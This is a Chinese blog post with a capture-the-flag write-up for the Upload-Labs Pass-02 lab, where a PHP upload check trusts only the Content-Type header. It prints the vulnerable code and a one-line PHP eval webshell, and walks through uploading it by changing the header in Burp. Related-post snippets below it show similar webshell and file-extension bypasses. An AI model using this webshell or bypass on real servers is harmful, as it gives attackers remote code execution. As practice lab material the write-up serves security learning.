【CTF Web】BUUCTF Upload-Labs-Linux Pass-02 Writeup(文件上传+PHP+MIME绕过)

最新推荐文章于 2024-09-10 13:51:36 发布
最新推荐文章于 2024-09-10 13:51:36 发布
阅读量817 收藏 26
点赞数 33
分类专栏: CTF Writeup 文章标签: 前端 linux 运维 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34988204/article/details/138325609
版权

Upload-Labs-Linux

1
点击部署靶机。

简介

upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。

注意

1.每一关没有固定的通关方法,大家不要自限思维!

2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路。

3.实在没有思路时,可以点击查看提示。

4.如果黑盒情况下,实在做不出,可以点击查看源码。

后续

如在渗透测试实战中遇到新的上传漏洞类型,会更新到upload-labs中。当然如果你也希望参加到这个工作当中,欢迎pull requests给我!

项目地址:https://github.com/c0ny1/upload-labs

任务

上传一个webshell到服务器。

提示

本pass在服务端对数据包的MIME进行检查!

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        if (($_FILES['upload_file']['type'] == 'image/jpeg') || ($_FILES['upload_file']['type'] == 'image/png') || ($_FILES['upload_file']['type'] == 'image/gif')) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' . $_FILES['upload_file']['name']            
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '文件类型不正确,请重新上传!';
        }
    } else {
        $msg = UPLOAD_PATH.'文件夹不存在,请手工创建!';
    }
}

原理

MIME

MIME(Multipurpose Internet Mail Extensions,多用途互联网邮件扩展)是一种互联网标准,它扩展了原始的邮件协议,使得邮件能够发送不只是纯文本,还可以发送如图像、音频、视频等非文本数据。此外,MIME还被广泛应用在数据通信领域,包括 HTTP 的Web传输协议。

MIME 类型是一个标准,用于表示文档、文件或字节流的性质和格式。例如,使用 “text/html” 作为 HTML 文档的 MIME 类型,使用 “image/jpeg” 作为 JPEG 图像。在 HTTP 交互中,MIME 类型被定义在 HTTP 头的 “Content-Type” 中,用来告诉浏览器应该如何处理接收到的内容。

MIME 类型通常由两部分组成:类型和子类型,它们由一个斜线分隔。例如,在 “text/html” 中,“text” 是类型,“html” 是子类型。常见的几种类型有 “text”、“image”、“application”、“video” 等。

在一些情况下,比如上传文件时,服务器会检查文件的 MIME 类型,以确定文件的类型是否被允许。这是一种安全措施,用来防止不安全或者不合法的文件被上传到服务器。

解法

传个一句话木马,

<?php @eval($_POST['a']); ?>

提示:文件类型不正确,请重新上传!

查看网页源代码。

<form enctype="multipart/form-data" method="post" onsubmit="return checkFile()">
                <p>请选择要上传的图片:</p><p>
                <input class="input_file" type="file" name="upload_file" data-sider-select-id="e7fedb5c-fe6f-4d5a-81bf-51457bff8050">
                <input class="button" type="submit" name="submit" value="上传">
            </p></form>

没有找到 checkFile 函数。

用 Burp 抓包。上传一句话木马。

将 Content-Type:

Content-Type: application/octet-stream

改为:

Content-Type: image/jpeg

上传成功。

右键点击图片,复制图像链接。

http://b4ec024c-ea12-4003-a944-4d3d47076d7d.node5.buuoj.cn:81/upload/a.php

通过蚁剑连接。

访问根目录。

找到 flag。

Flag

flag{e5c6ec40-25ad-4ef3-bd64-22ae1e9cd061}

声明

本博客上发布的所有关于网络攻防技术的文章,仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行,并且严格遵守了相关法律法规

博主坚决反对任何形式的非法黑客行为,包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时,必须遵守法律法规不得用于任何非法目的。对于因使用这些技术而导致的任何后果,博主不承担任何责任

HEX9CF
关注
专栏目录
BUUCTF-Web-[ACTF2020新生赛]Upload
m0_61851859的博客
03-27 501
4.打开burpsuite进行抓包,修改为php文件类型并将数据包发送回去,发现上传失败。5. 考虑是不是网站对php后缀进行过滤,采取黑名单绕过修改文件后缀为.phtml,上传成功。3.将文件后缀名修改为.jpg类型上传文件,上传成功。(但此时文件有错木马无法连接)1.打开题目在小灯泡那发现了文件上传,因此猜测存在文件上传漏洞。2.尝试上传一句话木马,上传失败仅允许上传弹窗提示的文件类型。7.连接成功并找到flag。6.使用蚁剑进行连接。
BUUCTF upload-labs
oJiuJieZhong的博客
10-11 3305
①这里是前端JS限制了我们只能上传特点格式的文件 ②这里我们可以在设置里面直接关闭网页的JS ③或者通过抓包的形式,绕过前端验证 ④这里在burp suite中将jpg改成php ⑤这里上传成功 ⑥我们也可以通过抓包的形式来了解文件上传的位置 ...
BUUCTF/Upload-Labs-Linux
weixin_44041994的博客
03-20 1750
strrchr()函数作用为查找字符串在另一字符串中最后一次出现的位置,并返回从该位置到字符串结尾的所有字符,本用来返回后缀名,如:webshell.php,则会返回.php,但是如果我们在.php后再加入一个 . ,则该函数只会返回 . ,可以轻松绕过检查。ps:只能是Windows系统,并且只能是php文件。文件的上传过程为:用户上传文件,服务器获取文件,然后保存临时文件,然后使用移动函数(比如php中的move_uploaded_file() ),才会将文件移动到站点的根目录下面。
CTF WebBUUCTF Upload-Labs-Linux Pass-14 Writeup(文件上传+PHP+文件包含漏洞+JPEG图片马+getimagesize绕过
HEX9CF的技术博客
09-09 960
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
buuctf-upload
m0_62094846的博客
10-31 777
按照指示上传文件 用burp抓取 直接看到flag,我以为就这么做完了,但是交不上去,再看页面,Look here,可能还是需要木马, 但用上次的方法,改文件格式为php,就不会显示上传成功了 查找发现,也可以上传,phtml文件名 就可以得到成功的返还了 接下来按照原来的方法做,用蚁剑,最后可以在根目录下得到flag ...
BUUCTF [ACTF2020 新生赛] Upload
Senimo
01-09 781
BUUCTF [ACTF2020 新生赛] Upload 考点: .phtml文件上传 前后端限制绕过 启动环境: 一个灯泡图标,点击的话会出现文件上传点: 随便上传点东西试试: 得到提示: 查看网页源码: <form enctype="multipart/form-data" method="post" onsubmit="return checkFile()"> 表单提交后会执行checkFile()函数,在main.js中查看该函数: function checkFile()
BUUCTF Web upload
H18779083518的博客
05-10 434
script language="php">eval($_REQUEST[1])</script>打开后即得flag:flag{d8c839e5-3aa7-40db-9899-858007fc3778}首先尝试一句话木马上传,尝试过多种绕过手段后发现仍然无法上传,于是我们怀疑是一句话木马被黑名单了。方法二:正常情况上传的文件都会存放在Upload,更可况题目就叫upload。方法一:看bp的回显(我没看见所以选择了方法二)成功上传一句话木马后我们尝试寻找木马的存放路径。找到路径后使用蚁剑连接,连接成功。
Web-buuctf-Upload
weixin_52804141的博客
01-20 200
这里两种绕过方法,第一种在浏览器中把java scrabit脚本关了就可以了,第二种更改下后缀文件,改成允许上传的文件后缀就好了。这里改成在把文件后缀改位php,发现不行,就可以试试phtml(这两种后缀都不会被服务器视为php执行)总结,很简单的一道上传题,以前也练过很多,就当一道复习题来做了。上传成功,蚁剑连接就好了,在找到flag文件,获得flag。先上传一个一句话木马,发现存在前端绕过
上传漏洞靶场:upload-labs 8-13关
TGFXK的博客
04-20 3796
目录 第八关: :&data 第九关:(点空点) 第十关:双写绕过 第十一关:白名单检测 00截断 第八关: :&data 利用windows系统下的NTFS文件的特性 当我们访问tgf.php::$data时相当于访问tgf.php,仅限于windows 靶场源码: 上传一句话木马:并抓包 增加::$data后缀 并放行 访问图像地址,输入预先密码可访问phpinfo文件 第九关:(点空点) 原理:文件只会被过滤一...
upload-labs 1-20关
weixin_58358185的博客
10-30 593
upload-labs
BUUCTF-sqli-labs1
Nothing-one的博客
07-16 1686
根据题目内容他让我们(请输入id作为带数值的参数 )这个为数字型注入。 这里面我用了sqlmap工具来进行解题。 在里面输入 python sqlmap.py -u +(网站名)(记住在网站名后面要加入?id=1) --dbs #获取数据库 这样我们就可以获得数据库中的名称了。 下面我们就要看数据库中的表明了。 python sqlmap.py -u +(网站名) -D 数据库名 --tables #列出表名 我们知道了表名,下面我们就要爆出字段名。 python sqlmap.py -u +(网站名)
upload-labs文件上传靶场
11-24
upload-labs:深入探索文件上传漏洞的靶场实践》 在网络安全领域,尤其是Web安全中,文件上传漏洞是一项常见的安全隐患。"upload-labs"是一个专门为渗透测试者和CTF(Capture The Flag)参赛者设计的PHP语言编写...
BUUCTF-Web[ACTF2020 新生赛]Upload
rumil的博客
06-24 2379
尝试修改后缀为:php1,php2, php3, php4, php5, phps, pht, phtm, phtml。经过测试和验证,当后缀为.phtml时上传成功的同时语句能被解析,可通过蚁剑连接。这次告诉我们这是一个有害的文件,无法正常上传,说明后端也做了过滤,我们尝试绕过。访问成功,验证是否可执行php语句,能被解析。连接成功,添加,并进入到文件目录,找flag。同理图片码也无法进行解析,上传无效。浏览器搜about:config。修改文件后缀,上传成功但无法解析。回到靶机界面,刷新后,再次上传。
BUUCTF-Web-[极客大挑战 2019]Upload
weixin_67813445的博客
04-29 976
,所以考虑修改为JS风格的代码标记,修改完之后发送,页面如下图所示,Don’t lie to me,it’s not image at all!用burpsuite进行抓包,修改MIME类型, 即将Content-Type修改为image/jpeg,修改之后页面如下图所示,显示NOT!将文件后缀名改为php的其他扩展名,页面如下图所示,检测文件内容中包含了’<?上传一个php文件,此处上传shell.php后页面如下图所示,显示不是图片。将文件后缀改为jpg,页面如下图所示,文件类型符合要求,但。
BUUCTF upload
wwwwyyyrre的博客
03-27 246
果然 用了js前端验证 关掉之后试着上传php php3 php5 phtml文件 发现phtml文件可以上传成功。这里之所以用phtml文件 是因为phtml文件可以被解析 图片马虽然有上传路径但是无法链接成功。发现不能是php文件 把文件后缀改成jpg形式 发现有后端过滤文件中不能包含<?这道题只要上传的不是jpg、png、gif结尾的图片都抓不了包 怀疑用了前端验证。上传php文件 发现不可以 并给显示 只可以上传jpg、png、gif结尾的图片。用蚁剑连接成功 在根目录找到flag。
CTF WebBUUCTF Upload-Labs-Linux Pass-01 Writeup(JS分析+代码审计+文件上传
HEX9CF的技术博客
08-29 1020
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
Upload-Labs-Linux 1-20(buuctf)
qq_66748496的博客
12-24 1844
buuoj.cn上的upload_lab 1-20简要题解,项目地址:https://github.com/c0ny1/upload-labs
CTF WebBUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)
HEX9CF的技术博客
09-08 1046
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
CTF WebBUUCTF Upload-Labs-Linux Pass-16 Writeup(文件上传+PHP+文件包含漏洞+GIF图片马+二次渲染绕过
最新发布
HEX9CF的技术博客
09-10 1263
upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得可以包含 flag.php 文件。具体的步骤如下: 1. 通过试错法找到可以绕过的字符,常用的有 null 字符(%00)、双字节绕过(%252e)、unicode 编码绕过等。 2. 经过试错法,发现可以使用双字节绕过绕过筛选器,构造如下 URL: ``` http://xxx.com/index.php?file=..%252Fflag ``` 这样就可以成功包含 flag.php 文件,从而获取 flag。 需要注意的是,这种漏洞具有比较高的危害性,因此在编写 PHP 代码时,一定要对输入进行过滤和验证。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值